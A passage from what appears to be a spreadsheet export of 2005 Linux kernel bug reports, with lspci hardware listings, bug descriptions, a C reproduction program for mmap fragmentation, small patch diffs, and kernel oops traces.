sec-latency=0 Memory behind bridge: dc000000-ddffffff Prefetchable memory behind bridge: d0000000-d7ffffff BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:07.0 ISA bridge: VIA Technologies, Inc. VT82C686 [Apollo Super South] (rev 40) Subsystem: VIA Technologies, Inc. VT82C686/A PCI to ISA Bridge Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:07.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Subsystem: VIA Technologies, Inc. VT82C586/B/VT82C686/A/B/VT8233/A/C/VT8235 PIPC Bus Master IDE Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Region 4: I/O ports at 9000 [size=16] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:07.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 16) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. (Wrong ID) USB Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, cache line size 08 Interrupt: pin D routed to IRQ 11 Region 4: I/O ports at 9400 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:07.4 Bridge: VIA Technologies, Inc. VT82C686 [Apollo Super ACPI] (rev 40) Subsystem: VIA Technologies, Inc. VT82C686 [Apollo Super ACPI] Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin ? routed to IRQ 11 Capabilities: [68] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:07.5 Multimedia audio controller: VIA Technologies, Inc. VT82C686 AC97 Audio Controller (rev 50) Subsystem: VIA Technologies, Inc. Onboard Audio on EP7KXA Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin C routed to IRQ 10 Region 0: I/O ports at 9c00 Region 1: I/O ports at a000 [size=4] Region 2: I/O ports at a400 [size=4] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:09.0 Multimedia audio controller: Creative Labs SB Audigy (rev 04) Subsystem: Creative Labs SB Audigy 2 ZS (SB0350) Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (500ns min, 5000ns max) Interrupt: pin A routed to IRQ 10 Region 0: I/O ports at a800 Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:09.1 Input device controller: Creative Labs SB Audigy MIDI/Game port (rev 04) Subsystem: Creative Labs SB Audigy MIDI/Game Port Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Region 0: I/O ports at ac00 Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:09.2 FireWire (IEEE 1394): Creative Labs SB Audigy FireWire Port (rev 04) (prog-if 10 [OHCI]) Subsystem: Creative Labs SB Audigy FireWire Port Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (500ns min, 1000ns max), cache line size 08 Interrupt: pin B routed to IRQ 10 Region 0: Memory at df125000 (32-bit, non-prefetchable) Region 1: Memory at df120000 (32-bit, non-prefetchable) [size=16K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ 0000:00:0b.0 Unknown mass storage controller: Promise Technology, Inc. PDC20267 (FastTrak100/Ultra100) (rev 02) Subsystem: Promise Technology, Inc. Ultra100 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at b000 Region 1: I/O ports at b400 [size=4] Region 2: I/O ports at b800 [size=8] Region 3: I/O ports at bc00 [size=4] Region 4: I/O ports at c000 [size=64] Region 5: Memory at df100000 (32-bit, non-prefetchable) [size=128K] Capabilities: [58] Power Management version 1 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:0c.0 Ethernet controller: Intel Corporation 82557/8/9 [Ethernet Pro 100] (rev 08) Subsystem: Intel Corporation EtherExpress PRO/100+ Management Adapter Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (2000ns min, 14000ns max), cache line size 08 Interrupt: pin A routed to IRQ 10 Region 0: Memory at df124000 (32-bit, non-prefetchable) Region 1: I/O ports at c400 [size=64] Region 2: Memory at df000000 (32-bit, non-prefetchable) [size=1M] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=2 PME- 0000:01:00.0 VGA compatible controller: nVidia Corporation NV28 [GeForce4 Ti 4200 AGP 8x] (rev a1) (prog-if 00 [VGA]) Subsystem: ASUSTeK Computer Inc.: Unknown device 807b Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 248 (1250ns min, 250ns max) Interrupt: pin A routed to IRQ 5 Region 0: Memory at dc000000 (32-bit, non-prefetchable) Region 1: Memory at d0000000 (32-bit, prefetchable) [size=128M] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [44] AGP version 3.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3- Rate=x1,x2,x4 Command: RQ=32 ArqSz=0 Cal=0 SBA- AGP+ GART64- 64bit- FW- Rate=x2 Software Environment: kernel &gt;2.6.11.5 (including 2.6.11.12-rc2) Problem Description: When plugging in a Zaurus 5600 and having usbnet loaded, usb0 device does not appear when running ifconfig -a. Steps to reproduce: have kernel 2.6.11.x (other boards have talked about any 11, 11.5 does not work). load uhci-hcd, ohci-hcd, usbnet. Run lsusb to make sure device is connected (Zaurus should appear). Run ifconfig -a. No usb0 device listed.</t>
  </si>
  <si>
    <t>message queues broken in 2.6.12-rc2 (x86-64)</t>
  </si>
  <si>
    <t>Since 2.6.11-rc1-mm2</t>
  </si>
  <si>
    <t>2005-04-18 16:37 UTC</t>
  </si>
  <si>
    <t>Nicolas Boichat</t>
  </si>
  <si>
    <t>2005-05-08 13:38 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: AMD64 Problem Description: Message queues (msgrcv/msgsnd) don't work correctly with 2.6.12-rc2: When sending a message, the data is "shifted" to the right by 7 bytes. Steps to reproduce: I attached two c files (one.c and two.c): - one sends data to a message queue (msgsnd) and displays what should have been sent. - two reads from the message queue (msgrcv) ans displays what have been received. I also attached a shell script (test.sh), which builds then runs one and two. Output with kernel 2.6.8, everything works fine: $uname -a Linux dudule 2.6.8-gentoo-r4 #5 SMP Mon Oct 4 10:16:30 CEST 2004 x86_64 AMD Athlon(tm) 64 Processor 3000+ AuthenticAMD GNU/Linux $./one 48 65 6c 6c 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $./two 48 65 6c 6c 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Output with kernel 2.6.12-rc2, the output is wrong: $uname -a Linux dudule 2.6.12-rc2 #5 SMP Thu Apr 7 23:45:01 CEST 2005 x86_64 AMD Athlon(tm) 64 Processor 3000+ AuthenticAMD GNU/Linux $./one 48 65 6c 6c 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $./two 00 00 00 00 00 00 00 48 65 6c 6c 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Please tell me if you want me to run this test with other kernel versions.</t>
  </si>
  <si>
    <t>2.6.12-rc2-mm3</t>
  </si>
  <si>
    <t>/proc/*/maps fragments too quickly compared to 2.4</t>
  </si>
  <si>
    <t>2005-04-19 11:55 UTC</t>
  </si>
  <si>
    <t>Wolfgang Wander</t>
  </si>
  <si>
    <t>2007-09-06 07:23 UTC</t>
  </si>
  <si>
    <t>Distribution: Suse 9.2 Hardware Environment: Dual AMD64 / 8GB memory Software Environment: 64 bit kernel 2.6.11.2 or .4 running 32 bit application Problem Description: The appended c program, compiled in 32 bit mode, runs on our 2.6.11.4 (64bit kernel) out of memory after a short while. Once this happens the programs copies /proc/self/maps to stdout which is large and very fragmented. The same program runs 'forever' and after that ;-) /proc/self/maps only contains a few entries of very large mmapped regions. Steps to reproduce: Compile the program below in 32 bit mode, run on 2.4 and 2.6 kernels. #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;unistd.h&gt; #include &lt;sys/mman.h&gt; #define numMaps 600 #define largeArea 9500000 #define forEver 1000000 #define oneMeg 0x100000 void aLLocator() { char* bvec[numMaps]; unsigned int i; memset( bvec,0,sizeof(bvec)); for( i = 0; i &lt; forEver ; ++i ) { unsigned oidx; unsigned kidx; int len; /* munmap old entries */ oidx = (i+numMaps/10) % numMaps; len = (oidx &amp; 7) ? ((oidx&amp;7)* oneMeg) : largeArea; /* map size */ if( bvec[oidx] ) { munmap( bvec[oidx], len ); bvec[oidx] = 0; } /* mmap new ones */ kidx = i % numMaps; len = (kidx &amp; 7) ? ((kidx&amp;7)* oneMeg) : largeArea; /* map size */ bvec[kidx] = (char*)(mmap(0, len, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)); if( bvec[kidx] == (char*)(-1) ) { printf("Failed after %d rounds\n", i); break; } } } int main() { FILE *f; int c; aLLocator(); f = fopen( "/proc/self/maps", "r" ); while( (c = fgetc(f)) != EOF ) putchar(c); fclose(f); return 0; }</t>
  </si>
  <si>
    <t>2.6.12-rc3</t>
  </si>
  <si>
    <t>FPU registers corrupt after S3</t>
  </si>
  <si>
    <t>2005-04-22 16:22 UTC</t>
  </si>
  <si>
    <t>Ben Liblit</t>
  </si>
  <si>
    <t>2005-11-06 18:55 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Linux 3 Hardware Environment: IBM ThinkPad X24 Software Environment: Fedora kernel RPM build "kernel-2.6.11-1.14_FC3" Problem Description: With ACPI enabled, I can put my ThinkPad X24 laptop to sleep (S3) and wake it back up again. However, if I used the very simple "echo 3 &gt;/proc/acpi/sleep" technique to sleep, my root shell is closed by the time the laptop resumes. It appears that several newlines and an EOF are arriving on my pseudo-TTY from ... well ... from I have no idea where. Steps to reproduce: 1. Log in to the text console as root. Or if you prefer, start a terminal window and "su" to root. 2. Type "echo 3 &gt;/proc/acpi/sleep". 3. Wake the computer back up. Actual Results: If you had logged in to the text console as root, you are no longer logged in. You're simply back to the "login:" prompt. Furthermore, a NULL control character ("^@") is visible as though it had been typed in at the "login:" prompt. If you had used "su" to become root, your root shell is no longer running. There are several blank lines below the "echo" command you typed, and then several blank prompts in the shell from which you typed "su". It appears as though the terminal window received (as input) a number of newlines with an EOF stuck in the middle somewhere. Expected Results: Sleeping and waking up should not generate any "phantom" input. The shell that did the write should come back in exactly the state we left it: still logged in, or still su'ed to root.</t>
  </si>
  <si>
    <t>Broken link "CQS query multiple bug databases"</t>
  </si>
  <si>
    <t>not applicable</t>
  </si>
  <si>
    <t>2005-04-23 05:18 UTC</t>
  </si>
  <si>
    <t>Andreas Kuckartz</t>
  </si>
  <si>
    <t>2005-08-18 09:10 UTC</t>
  </si>
  <si>
    <t>The link "CQS query multiple bug databases" from http://bugzilla.kernel.org/ is no longer operational.</t>
  </si>
  <si>
    <t>acpi_ec_leave_burst_mo: -------&gt;status fail or  " acpi_ec_space_handler: bit_width should be 8"</t>
  </si>
  <si>
    <t>2.6.13-rc1</t>
  </si>
  <si>
    <t>2005-04-24 12:55 UTC</t>
  </si>
  <si>
    <t>2005-07-27 18:33 UTC</t>
  </si>
  <si>
    <t>Distribution:Debian Sarge Hardware Environment:samsung nv5000 Hang on wake after sleep (echo 3 &gt; /proc/acpi/sleep), with kernel 2.6.11.7 it's working OK.</t>
  </si>
  <si>
    <t>Compile fails when SMP &amp;&amp; PREEMPT selected</t>
  </si>
  <si>
    <t>2.6.{8.1,12(-rc[13])}</t>
  </si>
  <si>
    <t>2005-04-25 00:05 UTC</t>
  </si>
  <si>
    <t>Turbo Fredriksson</t>
  </si>
  <si>
    <t>2005-09-03 02:03 UTC</t>
  </si>
  <si>
    <t>Distribution: ftp.kernel.org Hardware Environment: SPARC64 Software Environment: Debian GNU/Linux woody (+ backports), gcc v3.0.4 Problem Description: Compile fails when SMP &amp;&amp; PREEMPT selected Steps to reproduce: Select SMP _and_ preemptive kernel, try to compile: ----- s n i p ----- CC init/main.o In file included from include/linux/module.h:10, from init/main.c:16: include/linux/sched.h: In function `lock_need_resched': include/linux/sched.h:1180: request for member `break_lock' in something not a structure or union ----- s n i p ----- Doing a 'rgrep' shows that 'break_lock' is defined in 'arch-sparc/spinlock.h' (etc) but NOT in 'arch-sparc64/spinlock.h' (where it probably SHOULD have been defined. This have been broken for quite some time (I'm currently running a 2.6.8.1 kernel and that had/have the same problem - then I didn't care). To avoid any confusion (Kernel Version field), this is the version I can reproduce it on: 2.6.8.1 2.6.12 2.6.12-rc1 2.6.12-rc3 I'm setting severity=blocking, because I _really_ want both. The system isn't as responsive as i wish and I'm hoping/counting on that a preemptive kernel will improve performance... Please feel free to lower it to 'high' (at the very least :)</t>
  </si>
  <si>
    <t>paolo</t>
  </si>
  <si>
    <t>[OPERA] Potential bug detected in /drivers/video/sis/sis_main.c</t>
  </si>
  <si>
    <t>2005-04-25 15:01 UTC</t>
  </si>
  <si>
    <t>2005-09-25 22:11 UTC</t>
  </si>
  <si>
    <t>Problem Description: A potential bug is detected by our tool in linux- 2.6.11.7/drivers/video/sis/sis_main.c: --- sis_main.c 2005-04-25 16:50:04.000000000 -0500 +++ sis_main.fixed.c 2005-04-25 16:51:02.000000000 -0500 @@ -460,7 +460,7 @@ if(monitor-&gt;hmax &lt; sisfb_ddcfmodes[j].h) monitor-&gt;hmax = sisfb_ddcfmodes [j].h + 1; if(monitor-&gt;vmin &gt; sisfb_ddcsmodes[j].v) monitor-&gt;vmin = sisfb_ddcsmodes [j].v; if(monitor-&gt;vmax &lt; sisfb_ddcsmodes[j].v) monitor-&gt;vmax = sisfb_ddcsmodes [j].v; - if(monitor-&gt;dclockmax &lt; sisfb_ddcsmodes[j].d) monitor-&gt;dclockmax = sisfb_ddcsmodes[i].d; + if(monitor-&gt;dclockmax &lt; sisfb_ddcsmodes[j].d) monitor-&gt;dclockmax = sisfb_ddcsmodes[j].d; } } }</t>
  </si>
  <si>
    <t>[OPERA] Potential bug detected in /drivers/media/video/saa7134/saa7134-video.c</t>
  </si>
  <si>
    <t>2005-04-25 15:50 UTC</t>
  </si>
  <si>
    <t>2006-01-30 12:44 UTC</t>
  </si>
  <si>
    <t>Problem Description: A potential bug is detected by our tool in linux- 2.6.11.7/drivers/media/video/saa7134/saa7134-video.c: --- saa7134-video.c 2005-04-25 17:46:22.000000000 -0500 +++ saa7134-video.fixed.c 2005-04-25 17:47:29.000000000 -0500 @@ -1786,9 +1786,9 @@ crop-&gt;c.height = b-&gt;top - crop-&gt;c.top + b-&gt;height; if (crop-&gt;c.left &lt; b-&gt;left) - crop-&gt;c.top = b-&gt;left; + crop-&gt;c.left = b-&gt;left; if (crop-&gt;c.left &gt; b-&gt;left + b-&gt;width) - crop-&gt;c.top = b-&gt;left + b-&gt;width; + crop-&gt;c.left = b-&gt;left + b-&gt;width; if (crop-&gt;c.width &gt; b-&gt;left - crop-&gt;c.left + b-&gt;width) crop-&gt;c.width = b-&gt;left - crop-&gt;c.left + b-&gt;width;</t>
  </si>
  <si>
    <t>[OPERA] Potential bug detected in fs/xfs/quota/xfs_trans_dquot.c</t>
  </si>
  <si>
    <t>2005-04-25 16:35 UTC</t>
  </si>
  <si>
    <t>2005-08-09 10:59 UTC</t>
  </si>
  <si>
    <t>Problem Description: A potential bug is detected by our tool in linux- 2.6.11.7/fs/xfs/quota/xfs_trans_dquot.c: --- xfs_trans_dquot.c 2005-04-25 18:32:00.000000000 -0500 +++ xfs_trans_dquot.fixed.c 2005-04-25 18:33:41.000000000 -0500 @@ -499,7 +499,7 @@ * Adjust the RT reservation. */ if (qtrx-&gt;qt_rtblk_res != 0) { - if (qtrx-&gt;qt_blk_res != qtrx-&gt;qt_blk_res_used) { + if (qtrx-&gt;qt_rtblk_res != qtrx- &gt;qt_blk_res_used) { if (qtrx-&gt;qt_rtblk_res &gt; qtrx-&gt;qt_rtblk_res_used) dqp-&gt;q_res_rtbcount -= (xfs_qcnt_t)</t>
  </si>
  <si>
    <t>(net pcnet32) don't follow module options pass at the boot</t>
  </si>
  <si>
    <t>2005-04-26 10:14 UTC</t>
  </si>
  <si>
    <t>Guillaume Desmottes</t>
  </si>
  <si>
    <t>2006-01-03 09:28 UTC</t>
  </si>
  <si>
    <t>We have an Allied Telesyn 0000:01:09.0 Ethernet controller: Advanced Micro Devices [AMD] 79c970 [PCnet32 LANCE] (rev 36) We pass pcnet32.options=14 at the boot. The 100 Mbits led is on and mii-tools says that the card is 100Mbit Half-duplex but the card should be on full duplex according to the 14 options. If we force in full-duplex with mii-tools, it seems that there is no problem. We have tried to pass pcnet32.full_duplex=1 as arguments and there is no change.</t>
  </si>
  <si>
    <t>cfq scheduler lockup: NMI oops while running ltp - 20050207  on 2.6.12-rc2-mm3 with kdump enabled</t>
  </si>
  <si>
    <t>2005-04-28 23:53 UTC</t>
  </si>
  <si>
    <t>2005-07-12 03:15 UTC</t>
  </si>
  <si>
    <t>Distribution: SLES 9 SP1 --------------------------- Hardware Environment: SMP, 1way, Pentium IV 2.8GHz, 2G RAM Network Interface (e1000) Disk I/O SCSI storage controller: Adaptec Ultra320 --------------------------- Software Environment: 1. kernel - linux-2.6.12-rc2-mm3 2. ltp- 20050207 3. kexec-tools-1.101 + kdump patches -------------- Problem Description: While running ltp 20050207 on 2.6.12-rc2-mm3 kernel, we got the following oops and we got the kdump. The first kernel was booted with the following parameters root=&lt;&gt; vga=0x31a selinux=0 splash=silent acpi=oldboot resume=&lt;&gt; elevator=cfq showpts crashkernel=48M@16M console=tty0 console=ttyS0,38400n1 nmi_watchdog=2 Second kernel (dump capture kernel) was loaded using following kexec command root=&lt;&gt; init 1 vga=0x31a selinux=0 splash=silent acpi=oldboot resume=&lt;&gt; elevator=cfq showpts console=tty0 console=ttyS0,38400n1 nmi_watchdog=2 ltp was run using the command ltprunall -qp -o &lt;output file&gt; -l &lt;log file&gt; -t 12h NMI Watchdog detected LOCKUP on CPU0, eip c04bd3b4, registers: Modules linked in: CPU: 0 EIP: 0060:[&lt;c04bd3b4&gt;] Not tainted VLI EFLAGS: 00000046 (2.6.12-rc2-mm3-I) EIP is at _spin_lock_irqsave+0x24/0xa0 eax: 00000001 ebx: c4710f60 ecx: 00000001 edx: 00000086 esi: c05e6000 edi: c05e7d80 ebp: ffffffff esp: c05e7d58 ds: 007b es: 007b ss: 0068 Process swapper (pid: 0, threadinfo=c05e6000 task=c052cc00) Stack: c4710f60 f7ff1880 c01292c4 c4710f60 c4708f60 f7ff1880 c0129340 f7ff1880 c05e7d80 c0622000 00000086 f7ff1800 00000014 f7ff1800 f7ff1800 c036632f f7ff1880 00cef97c 00000292 00000292 f7fbbc40 00000000 c036676d f7ff1800 Call Trace: [&lt;c01292c4&gt;] lock_timer_base+0x24/0x50 [&lt;c0129340&gt;] __mod_timer+0x50/0xe0 [&lt;c036632f&gt;] cfq_arm_slice_timer+0x9f/0x120 [&lt;c036676d&gt;] cfq_select_queue+0x11d/0x130 [&lt;c0366a5e&gt;] cfq_dispatch_requests+0x3e/0x90 [&lt;c0366b55&gt;] cfq_next_request+0xa5/0xc0 [&lt;c0358adc&gt;] elv_next_request+0x3c/0x170 [&lt;c02e2507&gt;] kobject_get+0x17/0x20 [&lt;c039d770&gt;] scsi_request_fn+0x1f0/0x3a0 [&lt;c03973b7&gt;] scsi_put_command+0x87/0xd0 [&lt;c035b4fe&gt;] blk_run_queue+0x4e/0x70 [&lt;c039c94d&gt;] scsi_end_request+0xdd/0x110 [&lt;c039cd25&gt;] scsi_io_completion+0x1b5/0x4b0 [&lt;c04bd7df&gt;] _spin_unlock_irqrestore+0xf/0x30 [&lt;c03e182b&gt;] sd_rw_intr+0xdb/0x2b0 [&lt;c04bd316&gt;] _spin_lock+0x16/0x90 [&lt;c039c56a&gt;] scsi_device_unbusy+0x4a/0x90 [&lt;c0397b6a&gt;] scsi_finish_command+0x8a/0xb0 [&lt;c0397a6f&gt;] scsi_softirq+0xbf/0xe0 [&lt;c0124eba&gt;] __do_softirq+0x7a/0x100 [&lt;c0124f93&gt;] do_softirq+0x53/0x60 [&lt;c0125084&gt;] irq_exit+0x44/0x50 [&lt;c0105c18&gt;] do_IRQ+0x28/0x40 [&lt;c0103ea2&gt;] common_interrupt+0x1a/0x20 [&lt;c0101305&gt;] mwait_idle+0x25/0x50 [&lt;c030f233&gt;] acpi_processor_idle+0x0/0x25d [&lt;c030f336&gt;] acpi_processor_idle+0x103/0x25d [&lt;c030f233&gt;] acpi_processor_idle+0x0/0x25d [&lt;c01010e1&gt;] cpu_idle+0x41/0x80 [&lt;c05e89df&gt;] start_kernel+0x16f/0x190 [&lt;c05e83c0&gt;] unknown_bootoption+0x0/0x1e0 Code: 8d b4 26 00 00 00 00 83 ec 08 89 1c 24 89 c3 b8 01 00 00 00 89 74 24 04 e8 da cf c5 ff be 00 e0 ff ff 21 e6 9c 5a fa 31 c0 86 03 &lt;84&gt; c0 7e 14 c7 43 04 00 00 00 00 89 d0 8b 1c 24 8b 74 24 04 83 console shuts up ... &lt;0&gt;Kernel panic - not syncing: Aiee, killing interrupt handler!</t>
  </si>
  <si>
    <t>cdrecording fails</t>
  </si>
  <si>
    <t>every Kernel &gt; 2.6.8</t>
  </si>
  <si>
    <t>2005-04-29 08:22 UTC</t>
  </si>
  <si>
    <t>Michael Sch</t>
  </si>
  <si>
    <t>2005-06-27 08:28 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Philips PBRW5232L Software Environment: Cdrecord-Clone 2.01 and Kernel &gt;2.6.8 Problem Description: since changing the way to record cds it is impossible to burn a correct cd. when i start burning everything works fine in the first secs. then the cdrecorder slows down to 8X speed. (it is an 52X recorder) using an old kernel (2.6.8) works. Steps to reproduce: start your system with a current kernel and this special recorder and try to burn a disc.</t>
  </si>
  <si>
    <t>Random crashes when generating a lot of I/O load</t>
  </si>
  <si>
    <t>2.6.11-1.1267_FC4smp</t>
  </si>
  <si>
    <t>2005-04-29 12:49 UTC</t>
  </si>
  <si>
    <t>J.M. Maurer</t>
  </si>
  <si>
    <t>2006-01-17 12:39 UTC</t>
  </si>
  <si>
    <t>Jan Kara</t>
  </si>
  <si>
    <t>Distribution: Fedora Rawhide Hardware Environment: Dual PIII 450, 3 IDE HD's, SCSI Plextor writer, HP SureStore Tape drive Problem Description: Random (but with a bit or work, reproducable) crashes Steps to reproduce: Generating a bunch of IO load seems to do the trick. Call Trace: Apr 29 03:06:59 fileserver kernel: CPU: 0 Apr 29 03:06:59 fileserver kernel: EIP: 0060:[&lt;c018cab5&gt;] Not tainted VLI Apr 29 03:06:59 fileserver kernel: EFLAGS: 00010206 (2.6.11-1.1261_FC4smp) Apr 29 03:06:59 fileserver kernel: EIP is at dqput+0xf/0x15a Apr 29 03:06:59 fileserver kernel: eax: 00080000 ebx: 00080000 ecx: 00000000 edx: 00000000 Apr 29 03:06:59 fileserver kernel: esi: 00000001 edi: cc18f944 ebp: 00000080 esp: c17bfe84 Apr 29 03:06:59 fileserver kernel: ds: 007b es: 007b ss: 0068 Apr 29 03:06:59 fileserver kernel: Process kswapd0 (pid: 78, threadinfo=c17bf000 task=c17b3550) Apr 29 03:06:59 fileserver kernel: Stack: c17bf000 000000f2 c1722584 c1722584 cc18f948 00000001 c018d6a5 cc18f944 Apr 29 03:06:59 fileserver kernel: 00080000 00000065 e0af63e6 c1722584 00000001 00000000 000000f2 000b08ea Apr 29 03:06:59 fileserver kernel: 00000000 ded620a0 c17bfecc c17bfecc cc18f944 00080000 00000065 c0179928 Apr 29 03:06:59 fileserver kernel: Call Trace: Apr 29 03:06:59 fileserver kernel: [&lt;c018d6a5&gt;] dquot_drop+0x49/0x7e Apr 29 03:06:59 fileserver kernel: [&lt;e0af63e6&gt;] reiserfs_dquot_drop+0x26/0x48 [reiserfs] Apr 29 03:06:59 fileserver kernel: [&lt;c0179928&gt;] clear_inode+0x11b/0x125 Apr 29 03:06:59 fileserver kernel: [&lt;c0179948&gt;] dispose_list+0x16/0x8d Apr 29 03:06:59 fileserver kernel: [&lt;c0179ce4&gt;] prune_icache+0x161/0x20b Apr 29 03:06:59 fileserver kernel: [&lt;c0179dc5&gt;] shrink_icache_memory+0x37/0x39 Apr 29 03:06:59 fileserver kernel: [&lt;c014f14e&gt;] shrink_slab+0xfd/0x152 Apr 29 03:06:59 fileserver kernel: [&lt;c015036f&gt;] balance_pgdat+0x207/0x3b9 Apr 29 03:06:59 fileserver kernel: [&lt;c01505fd&gt;] kswapd+0xdc/0x12c Apr 29 03:06:59 fileserver kernel: [&lt;c0134a4b&gt;] autoremove_wake_function+0x0/0x37 Apr 29 03:06:59 fileserver kernel: [&lt;c0150521&gt;] kswapd+0x0/0x12c Apr 29 03:06:59 fileserver kernel: [&lt;c01023d1&gt;] kernel_thread_helper+0x5/0xb Apr 29 03:06:59 fileserver kernel: Code: 85 eb 51 89 c8 f7 ea c1 fa 05 89 c8 c1 f8 1f 29 c2 0f af 15 40 3b 36 c0 89 d0 5b c3 56 53 83 ec 10 89 c3 85 c0 0f 84 45 01 00 00 &lt;8b&gt; 40 38 85 c0 0f 84 f2 00 00 00 